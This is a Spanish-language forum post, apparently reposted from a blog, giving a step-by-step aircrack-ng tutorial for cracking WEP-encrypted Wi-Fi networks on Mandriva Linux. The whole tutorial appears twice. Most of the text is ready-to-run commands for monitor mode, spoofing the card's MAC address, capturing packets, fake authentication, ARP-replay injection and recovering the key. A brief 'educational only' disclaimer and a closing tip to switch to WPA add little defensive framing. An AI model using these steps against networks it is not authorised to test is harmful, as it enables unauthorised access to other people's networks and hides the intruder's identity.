- grupoed2kcolaborador
Cantidad de envíos : 314
Edad : 44
Perfil : Patience, my friend, is a virtue...
Una cita de Georges Orwell:
Libertad de expresión es el derecho a decir
lo que nadie quere escuchar.
... .... .... .... .... ...
Tú firma Personal : Participa
Barra de Respeto :
Reputación : 46
Fecha de inscripción : 14/10/2008
Cómo usar aircrack en redes con seguridad (WEP) en Mandriva Linux
8/11/2009, 1:04 pm
Cómo usar aircrack en redes con seguridad (WEP) en Mandriva Linux
Bueno, pues en esta ocasión voy a explicar cómo crackear redes Wi-Fi con clave de cifrado WEP usando aircrack.
Primeramente debo decir que este tútorial está basado en este otro,
así que el mérito en cuanto a los comandos usados es de su autor, yo he
cambiado como realizar la instalación, y he añadido capturas,
explicaciones y alguna otra cosilla.
También hay que aclarar que el contenido de este tutorial es
meramente educativo, así que ni yo ni la WEP nos hacemos responsables.
Ya deberías saber que esto no es un videojuego, que es real y con
consecuencias reales, y si no lo sabes, es tu problema.
También aclaro que todo lo he realizado sobre mi red de Wi-Fi, así que es totalmente legal.
Ahora sí, al lío! (Recuerda: explicaciones entre paréntesis, datos variables entre corchetes)
Primero los requisitos:
* Hardware:
Tarjeta de red compatible con el modo monitor, aquí tenéis un listado.
Yo usaré un módem USB Dlink DWL-G122. Si tu tarjeta no es compatible
-cosa poco probable si estás leyendo esto desde Mandriva-, tendrás que
conseguir una o no podrás seguir esta guía.
* Software: debemos instalar los siguientes paquetes:
aircrack-ng (el aircrack)
macchanger (una mini-maravilla que nos permitirá falsear la MAC de nuestra tarjeta de red)
terminator (una forma ingeniosa de tener organizadas las terminales)
Recomiendo instalar desde "Instalar y quitar software" o desde la terminal -urpmi [paquete]-.
Ahora vamos a lo que mola:
1. Desactivamos la conexión inalámbrica. Debemos quedarnos sin conexión.
2. Ahora vamos a empezar con las terminales o el terminator, lo que
hayas elegido, pero deberás tener cuatro abiertas o ir abriéndolas, a
tu gusto.
Terminal #1
$ su
$ [contraseña]
$ iwconfig (nos muestra nuestras tarjetas de red, es evidente cuál elegir)
$ airmon-ng start wlan0 (iniciamos modo monitor, desde ahora me reconoce la tarjeta como mon0, así que usaré ése)
$ ifconfig mon0 down (damos de baja nuestra tarjeta)
$ macchanger -m 00:11:22:33:44:55 mon0 (cambiamos la mac de nuestra tarjeta por una fácil de recordar
$ ifconfig mon0 up (damos de alta nuestra tarjeta)
Con esto hemos terminado una parte, deberíamos tener algo como lo de
la captura de abajo. Bien, comprueba que no te has muerto y sigue con
la misma terminal.
$ airodump-ng mon0 (iniciamos un escaneo, de aquí elegiremos nuestra red a crackear. Debe tener una clave de cifrado WEP)
Paramos la escaneada con Ctrl + C -letra C-
$ airodump-ng -c [número del canal] -w [nombre de la red] --bssid
[direccion MAC de la red] mon0 (Empieza lo bueno, jaja, con esto
empezamos a capturar paquetes)
Con esto y un bizcocho, hemos acabado... En esta terminal xD
Terminal #2
$ su
$ [contraseña]
$ aireplay-ng -1 6000 -a [direccion MAC de la red] -h 00:11:22:33:44:55 mon0 (asociamos nuestra tarjeta de red al BSSID)
Ya está... Quiero decir que esta terminal ya está. Nota: si falla en
este punto lo más probable es que la señal sea demasiado débil. Veamos
como queda:
Terminal #3
$ su
$ [contraseña]
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC de la
red] -h 00:11:22:33:44:55 mon0 (esto ya es un ataque propiamente dicho,
nos ayudará a crackear la WEP antes de que nos jubilemos)
$ (cuando nos pregunte si queremos usar un paquete es porque ha pillado
un paquete guapo -que se puede aprovechar-. Obviamente le decimos que
sí -primero "y" y luego "enter"-)
Ahora ya sólo queda esperar, dependiendo de la red y de la tarjeta
os recomiendo fumar un cigarro, tomar un café, bajaros al bar y, en
casos extremos, pasar la noche entera bebiendo whisky solo, o con
amigos, ahí no me meto
Cuando pillemos un buen paquete -Dios, que mal suena eso-, si somos
de los que nos fijamos en todo, nos daremos cuenta de que si miramos la
primera consola está pillando paquetes #Data a lo bestia -y si no no
importa, te dejo mirarlo ahora - , nada que ver con lo que pasaba
antes. Bien cuando tengamos una buena cantidad de paquetes +30.000 como
bastante poco, pasamos al siguiente paso. Aquí tenéis un pantallazo:
Terminal #4
$ su
$ [contraseña]
$ aircrack-ng -z [nombre de la red]*.cap (crackeamos a partir de los
ficheros capturados. El asterísco no es una errata. Si no podemos,
abrimos nuevamente una terminal y probamos pasado un rato)
Nota, si no la consigues es porque necesitas más paquetes... Simplemente espera.
Nota II: Una vez conseguida estará en formato XX:XX:XX:XX:XX, pero tendremos que ponerla en formato XXXXXXXXXX
Ahora sí, así es como nos debe quedar todo al final:
Terminal #Deteniendo modo monitor:
$ su
$ [contraseña]
$ airmon-ng stop mon0
$ iwconfig (comprobamos que todo está en su sitio)
Y ya está. Sólo una cosa, después de esto... No sé como decirlo,
pero habría que ser más que vago para no pasar de WEP a WPA o WPA2...
"Una cosa más que sabéis, un poco más guapos que sois"
by DaPG
BlogDrake
Bueno, pues en esta ocasión voy a explicar cómo crackear redes Wi-Fi con clave de cifrado WEP usando aircrack.
Primeramente debo decir que este tútorial está basado en este otro,
así que el mérito en cuanto a los comandos usados es de su autor, yo he
cambiado como realizar la instalación, y he añadido capturas,
explicaciones y alguna otra cosilla.
También hay que aclarar que el contenido de este tutorial es
meramente educativo, así que ni yo ni la WEP nos hacemos responsables.
Ya deberías saber que esto no es un videojuego, que es real y con
consecuencias reales, y si no lo sabes, es tu problema.
También aclaro que todo lo he realizado sobre mi red de Wi-Fi, así que es totalmente legal.
Ahora sí, al lío! (Recuerda: explicaciones entre paréntesis, datos variables entre corchetes)
Primero los requisitos:
* Hardware:
Tarjeta de red compatible con el modo monitor, aquí tenéis un listado.
Yo usaré un módem USB Dlink DWL-G122. Si tu tarjeta no es compatible
-cosa poco probable si estás leyendo esto desde Mandriva-, tendrás que
conseguir una o no podrás seguir esta guía.
* Software: debemos instalar los siguientes paquetes:
aircrack-ng (el aircrack)
macchanger (una mini-maravilla que nos permitirá falsear la MAC de nuestra tarjeta de red)
terminator (una forma ingeniosa de tener organizadas las terminales)
Recomiendo instalar desde "Instalar y quitar software" o desde la terminal -urpmi [paquete]-.
Ahora vamos a lo que mola:
1. Desactivamos la conexión inalámbrica. Debemos quedarnos sin conexión.
2. Ahora vamos a empezar con las terminales o el terminator, lo que
hayas elegido, pero deberás tener cuatro abiertas o ir abriéndolas, a
tu gusto.
Terminal #1
$ su
$ [contraseña]
$ iwconfig (nos muestra nuestras tarjetas de red, es evidente cuál elegir)
$ airmon-ng start wlan0 (iniciamos modo monitor, desde ahora me reconoce la tarjeta como mon0, así que usaré ése)
$ ifconfig mon0 down (damos de baja nuestra tarjeta)
$ macchanger -m 00:11:22:33:44:55 mon0 (cambiamos la mac de nuestra tarjeta por una fácil de recordar
$ ifconfig mon0 up (damos de alta nuestra tarjeta)
Con esto hemos terminado una parte, deberíamos tener algo como lo de
la captura de abajo. Bien, comprueba que no te has muerto y sigue con
la misma terminal.
$ airodump-ng mon0 (iniciamos un escaneo, de aquí elegiremos nuestra red a crackear. Debe tener una clave de cifrado WEP)
Paramos la escaneada con Ctrl + C -letra C-
$ airodump-ng -c [número del canal] -w [nombre de la red] --bssid
[direccion MAC de la red] mon0 (Empieza lo bueno, jaja, con esto
empezamos a capturar paquetes)
Con esto y un bizcocho, hemos acabado... En esta terminal xD
Terminal #2
$ su
$ [contraseña]
$ aireplay-ng -1 6000 -a [direccion MAC de la red] -h 00:11:22:33:44:55 mon0 (asociamos nuestra tarjeta de red al BSSID)
Ya está... Quiero decir que esta terminal ya está. Nota: si falla en
este punto lo más probable es que la señal sea demasiado débil. Veamos
como queda:
Terminal #3
$ su
$ [contraseña]
$ aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC de la
red] -h 00:11:22:33:44:55 mon0 (esto ya es un ataque propiamente dicho,
nos ayudará a crackear la WEP antes de que nos jubilemos)
$ (cuando nos pregunte si queremos usar un paquete es porque ha pillado
un paquete guapo -que se puede aprovechar-. Obviamente le decimos que
sí -primero "y" y luego "enter"-)
Ahora ya sólo queda esperar, dependiendo de la red y de la tarjeta
os recomiendo fumar un cigarro, tomar un café, bajaros al bar y, en
casos extremos, pasar la noche entera bebiendo whisky solo, o con
amigos, ahí no me meto
Cuando pillemos un buen paquete -Dios, que mal suena eso-, si somos
de los que nos fijamos en todo, nos daremos cuenta de que si miramos la
primera consola está pillando paquetes #Data a lo bestia -y si no no
importa, te dejo mirarlo ahora - , nada que ver con lo que pasaba
antes. Bien cuando tengamos una buena cantidad de paquetes +30.000 como
bastante poco, pasamos al siguiente paso. Aquí tenéis un pantallazo:
Terminal #4
$ su
$ [contraseña]
$ aircrack-ng -z [nombre de la red]*.cap (crackeamos a partir de los
ficheros capturados. El asterísco no es una errata. Si no podemos,
abrimos nuevamente una terminal y probamos pasado un rato)
Nota, si no la consigues es porque necesitas más paquetes... Simplemente espera.
Nota II: Una vez conseguida estará en formato XX:XX:XX:XX:XX, pero tendremos que ponerla en formato XXXXXXXXXX
Ahora sí, así es como nos debe quedar todo al final:
Terminal #Deteniendo modo monitor:
$ su
$ [contraseña]
$ airmon-ng stop mon0
$ iwconfig (comprobamos que todo está en su sitio)
Y ya está. Sólo una cosa, después de esto... No sé como decirlo,
pero habría que ser más que vago para no pasar de WEP a WPA o WPA2...
"Una cosa más que sabéis, un poco más guapos que sois"
by DaPG
BlogDrake
Permisos de este foro:
No puedes responder a temas en este foro.